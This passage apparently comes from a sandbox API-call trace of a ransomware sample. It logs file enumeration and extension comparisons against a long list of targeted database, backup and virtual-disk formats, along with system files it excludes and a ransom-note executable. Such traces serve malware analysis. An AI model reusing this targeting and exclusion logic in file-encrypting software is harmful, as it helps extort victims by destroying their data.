(lpString1="ni", lpString2="db") returned 1 [0040.279] lstrlenW (lpString="db2") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.279] lstrlenW (lpString="db3") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.279] lstrlenW (lpString="dbf") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.280] lstrlenW (lpString="mdf") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.280] lstrlenW (lpString="mdb") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.280] lstrlenW (lpString="sql") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.280] lstrlenW (lpString="sqlite") returned 6 [0040.280] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.280] lstrlenW (lpString="sqlite3") returned 7 [0040.280] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.280] lstrlenW (lpString="sqlitedb") returned 8 [0040.280] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.280] lstrlenW (lpString="xml") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.280] lstrlenW (lpString="$er") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.280] lstrlenW (lpString="4dd") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.280] lstrlenW (lpString="4dl") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.280] lstrlenW (lpString="^^^") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.280] lstrlenW (lpString="abs") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.280] lstrlenW (lpString="abx") returned 3 [0040.280] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.280] lstrlenW (lpString="accdb") returned 5 [0040.280] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.280] lstrlenW (lpString="accdc") returned 5 [0040.280] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.280] lstrlenW (lpString="accde") returned 5 [0040.280] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.280] lstrlenW (lpString="accdr") returned 5 [0040.280] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.280] lstrlenW (lpString="accdt") returned 5 [0040.280] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.281] lstrlenW (lpString="accdw") returned 5 [0040.281] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.281] lstrlenW (lpString="accft") returned 5 [0040.281] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.281] lstrlenW (lpString="adb") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.281] lstrlenW (lpString="adb") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.281] lstrlenW (lpString="ade") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.281] lstrlenW (lpString="adf") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.281] lstrlenW (lpString="adn") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.281] lstrlenW (lpString="adp") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.281] lstrlenW (lpString="alf") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.281] lstrlenW (lpString="ask") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.281] lstrlenW (lpString="btr") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.281] lstrlenW (lpString="cat") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.281] lstrlenW (lpString="cdb") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.281] lstrlenW (lpString="ckp") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.281] lstrlenW (lpString="cma") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.281] lstrlenW (lpString="cpd") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.281] lstrlenW (lpString="dacpac") returned 6 [0040.281] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.281] lstrlenW (lpString="dad") returned 3 [0040.281] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.281] lstrlenW (lpString="dadiagrams") returned 10 [0040.282] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.282] lstrlenW (lpString="daschema") returned 8 [0040.282] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.282] lstrlenW (lpString="db-journal") returned 10 [0040.282] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.282] lstrlenW (lpString="db-shm") returned 6 [0040.282] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.282] lstrlenW (lpString="db-wal") returned 6 [0040.282] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.282] lstrlenW (lpString="dbc") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.282] lstrlenW (lpString="dbs") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.282] lstrlenW (lpString="dbt") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.282] lstrlenW (lpString="dbv") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.282] lstrlenW (lpString="dbx") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.282] lstrlenW (lpString="dcb") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.282] lstrlenW (lpString="dct") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.282] lstrlenW (lpString="dcx") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0040.282] lstrlenW (lpString="ddl") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0040.282] lstrlenW (lpString="dlis") returned 4 [0040.282] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0040.282] lstrlenW (lpString="dp1") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0040.282] lstrlenW (lpString="dqy") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0040.282] lstrlenW (lpString="dsk") returned 3 [0040.282] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0040.282] lstrlenW (lpString="dsn") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0040.283] lstrlenW (lpString="dtsx") returned 4 [0040.283] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0040.283] lstrlenW (lpString="dxl") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0040.283] lstrlenW (lpString="eco") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0040.283] lstrlenW (lpString="ecx") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0040.283] lstrlenW (lpString="edb") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0040.283] lstrlenW (lpString="epim") returned 4 [0040.283] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0040.283] lstrlenW (lpString="fcd") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0040.283] lstrlenW (lpString="fdb") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0040.283] lstrlenW (lpString="fic") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0040.283] lstrlenW (lpString="flexolibrary") returned 12 [0040.283] lstrlenW (lpString="fm5") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0040.283] lstrlenW (lpString="fmp") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0040.283] lstrlenW (lpString="fmp12") returned 5 [0040.283] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0040.283] lstrlenW (lpString="fmpsl") returned 5 [0040.283] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0040.283] lstrlenW (lpString="fol") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0040.283] lstrlenW (lpString="fp3") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0040.283] lstrlenW (lpString="fp4") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0040.283] lstrlenW (lpString="fp5") returned 3 [0040.283] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0040.283] lstrlenW (lpString="fp7") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0040.284] lstrlenW (lpString="fpt") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0040.284] lstrlenW (lpString="frm") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0040.284] lstrlenW (lpString="gdb") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.284] lstrlenW (lpString="gdb") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.284] lstrlenW (lpString="grdb") returned 4 [0040.284] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0040.284] lstrlenW (lpString="gwi") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0040.284] lstrlenW (lpString="hdb") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0040.284] lstrlenW (lpString="his") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0040.284] lstrlenW (lpString="ib") returned 2 [0040.284] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0040.284] lstrlenW (lpString="idb") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0040.284] lstrlenW (lpString="ihx") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0040.284] lstrlenW (lpString="itdb") returned 4 [0040.284] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0040.284] lstrlenW (lpString="itw") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0040.284] lstrlenW (lpString="jet") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0040.284] lstrlenW (lpString="jtx") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0040.284] lstrlenW (lpString="kdb") returned 3 [0040.284] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0040.284] lstrlenW (lpString="kexi") returned 4 [0040.284] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0040.284] lstrlenW (lpString="kexic") returned 5 [0040.284] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0040.285] lstrlenW (lpString="kexis") returned 5 [0040.285] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0040.285] lstrlenW (lpString="lgc") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0040.285] lstrlenW (lpString="lwx") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0040.285] lstrlenW (lpString="maf") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0040.285] lstrlenW (lpString="maq") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0040.285] lstrlenW (lpString="mar") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0040.285] lstrlenW (lpString="marshal") returned 7 [0040.285] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0040.285] lstrlenW (lpString="mas") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0040.285] lstrlenW (lpString="mav") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0040.285] lstrlenW (lpString="maw") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0040.285] lstrlenW (lpString="mdbhtml") returned 7 [0040.285] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0040.285] lstrlenW (lpString="mdn") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0040.285] lstrlenW (lpString="mdt") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0040.285] lstrlenW (lpString="mfd") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0040.285] lstrlenW (lpString="mpd") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0040.285] lstrlenW (lpString="mrg") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0040.285] lstrlenW (lpString="mud") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0040.285] lstrlenW (lpString="mwb") returned 3 [0040.285] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0040.285] lstrlenW (lpString="myd") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0040.286] lstrlenW (lpString="ndf") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0040.286] lstrlenW (lpString="nnt") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0040.286] lstrlenW (lpString="nrmlib") returned 6 [0040.286] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0040.286] lstrlenW (lpString="ns2") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0040.286] lstrlenW (lpString="ns3") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0040.286] lstrlenW (lpString="ns4") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0040.286] lstrlenW (lpString="nsf") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0040.286] lstrlenW (lpString="nv") returned 2 [0040.286] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0040.286] lstrlenW (lpString="nv2") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0040.286] lstrlenW (lpString="nwdb") returned 4 [0040.286] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0040.286] lstrlenW (lpString="nyf") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0040.286] lstrlenW (lpString="odb") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.286] lstrlenW (lpString="odb") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.286] lstrlenW (lpString="oqy") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0040.286] lstrlenW (lpString="ora") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0040.286] lstrlenW (lpString="orx") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0040.286] lstrlenW (lpString="owc") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0040.286] lstrlenW (lpString="p96") returned 3 [0040.286] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0040.287] lstrlenW (lpString="p97") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0040.287] lstrlenW (lpString="pan") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0040.287] lstrlenW (lpString="pdb") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0040.287] lstrlenW (lpString="pdm") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0040.287] lstrlenW (lpString="pnz") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0040.287] lstrlenW (lpString="qry") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0040.287] lstrlenW (lpString="qvd") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0040.287] lstrlenW (lpString="rbf") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0040.287] lstrlenW (lpString="rctd") returned 4 [0040.287] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0040.287] lstrlenW (lpString="rod") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0040.287] lstrlenW (lpString="rodx") returned 4 [0040.287] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0040.287] lstrlenW (lpString="rpd") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0040.287] lstrlenW (lpString="rsd") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0040.287] lstrlenW (lpString="sas7bdat") returned 8 [0040.287] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0040.287] lstrlenW (lpString="sbf") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0040.287] lstrlenW (lpString="scx") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0040.287] lstrlenW (lpString="sdb") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0040.287] lstrlenW (lpString="sdc") returned 3 [0040.287] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0040.288] lstrlenW (lpString="sdf") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0040.288] lstrlenW (lpString="sis") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0040.288] lstrlenW (lpString="spq") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0040.288] lstrlenW (lpString="te") returned 2 [0040.288] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0040.288] lstrlenW (lpString="teacher") returned 7 [0040.288] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0040.288] lstrlenW (lpString="tmd") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0040.288] lstrlenW (lpString="tps") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0040.288] lstrlenW (lpString="trc") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.288] lstrlenW (lpString="trc") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.288] lstrlenW (lpString="trm") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0040.288] lstrlenW (lpString="udb") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0040.288] lstrlenW (lpString="udl") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0040.288] lstrlenW (lpString="usr") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0040.288] lstrlenW (lpString="v12") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0040.288] lstrlenW (lpString="vis") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0040.288] lstrlenW (lpString="vpd") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0040.288] lstrlenW (lpString="vvv") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0040.288] lstrlenW (lpString="wdb") returned 3 [0040.288] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0040.289] lstrlenW (lpString="wmdb") returned 4 [0040.289] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0040.289] lstrlenW (lpString="wrk") returned 3 [0040.289] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0040.289] lstrlenW (lpString="xdb") returned 3 [0040.289] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0040.290] lstrlenW (lpString="xld") returned 3 [0040.290] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0040.290] lstrlenW (lpString="xmlff") returned 5 [0040.290] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0040.290] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x497a4c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.290] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.290] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kalimba.mp3", cAlternateFileName="")) returned 1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="aoldtz.exe") returned 1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".") returned 1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="..") returned 1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="windows") returned -1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="bootmgr") returned 1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="temp") returned -1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="pagefile.sys") returned -1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="boot") returned 1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="ids.txt") returned 1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="ntuser.dat") returned -1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="perflogs") returned -1 [0040.290] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="MSBuild") returned -1 [0040.290] lstrlenW (lpString="Kalimba.mp3") returned 11 [0040.290] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\desktop.ini") returned 59 [0040.290] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Kalimba.mp3" | out: lpString1="Kalimba.mp3") returned="Kalimba.mp3" [0040.290] lstrlenW (lpString="Kalimba.mp3") returned 11 [0040.290] lstrlenW (lpString="Ares865") returned 7 [0040.290] lstrcmpiW (lpString1="mba.mp3", lpString2="Ares865") returned 1 [0040.290] lstrlenW (lpString=".dll") returned 4 [0040.291] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".dll") returned 1 [0040.291] lstrlenW (lpString=".lnk") returned 4 [0040.291] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".lnk") returned 1 [0040.291] lstrlenW (lpString=".ini") returned 4 [0040.291] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".ini") returned 1 [0040.291] lstrlenW (lpString=".sys") returned 4 [0040.291] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".sys") returned 1 [0040.291] lstrlenW (lpString="Kalimba.mp3") returned 11 [0040.291] lstrlenW (lpString="bak") returned 3 [0040.291] lstrcmpiW (lpString1="mp3", lpString2="bak") returned 1 [0040.291] lstrlenW (lpString="ba_") returned 3 [0040.291] lstrcmpiW (lpString1="mp3", lpString2="ba_") returned 1 [0040.291] lstrlenW (lpString="dbb") returned 3 [0040.291] lstrcmpiW (lpString1="mp3", lpString2="dbb") returned 1 [0040.291] lstrlenW (lpString="vmdk") returned 4 [0040.291] lstrcmpiW (lpString1=".mp3", lpString2="vmdk") returned -1 [0040.291] lstrlenW (lpString="rar") returned 3 [0040.291] lstrcmpiW (lpString1="mp3", lpString2="rar") returned -1 [0040.291] lstrlenW (lpString="zip") returned 3 [0040.291] lstrcmpiW (lpString1="mp3", lpString2="zip") returned -1 [0040.291] lstrlenW (lpString="tgz") returned 3 [0040.291] lstrcmpiW (lpString1="mp3", lpString2="tgz") returned -1 [0040.291] lstrlenW (lpString="vbox") returned 4 [0040.291] lstrcmpiW (lpString1=".mp3", lpString2="vbox") returned -1 [0040.291] lstrlenW (lpString="vdi") returned 3 [0040.291] lstrcmpiW (lpString1="mp3", lpString2="vdi") returned -1 [0040.291] lstrlenW (lpString="vhd") returned 3 [0040.291] lstrcmpiW (lpString1="mp3", lpString2="vhd") returned -1 [0040.291] lstrlenW (lpString="vhdx") returned 4 [0040.291] lstrcmpiW (lpString1=".mp3", lpString2="vhdx") returned -1 [0040.291] lstrlenW (lpString="avhd") returned 4 [0040.291] lstrcmpiW (lpString1=".mp3", lpString2="avhd") returned -1 [0040.291] lstrlenW (lpString="db") returned 2 [0040.291] lstrcmpiW (lpString1="p3", lpString2="db") returned 1 [0040.291] lstrlenW (lpString="db2") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="db2") returned 1 [0040.292] lstrlenW (lpString="db3") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="db3") returned 1 [0040.292] lstrlenW (lpString="dbf") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="dbf") returned 1 [0040.292] lstrlenW (lpString="mdf") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="mdf") returned 1 [0040.292] lstrlenW (lpString="mdb") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="mdb") returned 1 [0040.292] lstrlenW (lpString="sql") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="sql") returned -1 [0040.292] lstrlenW (lpString="sqlite") returned 6 [0040.292] lstrcmpiW (lpString1="ba.mp3", lpString2="sqlite") returned -1 [0040.292] lstrlenW (lpString="sqlite3") returned 7 [0040.292] lstrcmpiW (lpString1="mba.mp3", lpString2="sqlite3") returned -1 [0040.292] lstrlenW (lpString="sqlitedb") returned 8 [0040.292] lstrcmpiW (lpString1="imba.mp3", lpString2="sqlitedb") returned -1 [0040.292] lstrlenW (lpString="xml") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="xml") returned -1 [0040.292] lstrlenW (lpString="$er") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="$er") returned 1 [0040.292] lstrlenW (lpString="4dd") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="4dd") returned 1 [0040.292] lstrlenW (lpString="4dl") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="4dl") returned 1 [0040.292] lstrlenW (lpString="^^^") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="^^^") returned 1 [0040.292] lstrlenW (lpString="abs") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="abs") returned 1 [0040.292] lstrlenW (lpString="abx") returned 3 [0040.292] lstrcmpiW (lpString1="mp3", lpString2="abx") returned 1 [0040.292] lstrlenW (lpString="accdb") returned 5 [0040.292] lstrcmpiW (lpString1="a.mp3", lpString2="accdb") returned -1 [0040.292] lstrlenW (lpString="accdc") returned 5 [0040.292] lstrcmpiW (lpString1="a.mp3", lpString2="accdc") returned -1 [0040.292] lstrlenW (lpString="accde") returned 5 [0040.292] lstrcmpiW (lpString1="a.mp3", lpString2="accde") returned -1 [0040.293] lstrlenW (lpString="accdr") returned 5 [0040.293] lstrcmpiW (lpString1="a.mp3", lpString2="accdr") returned -1 [0040.293] lstrlenW (lpString="accdt") returned 5 [0040.293] lstrcmpiW (lpString1="a.mp3", lpString2="accdt") returned -1 [0040.293] 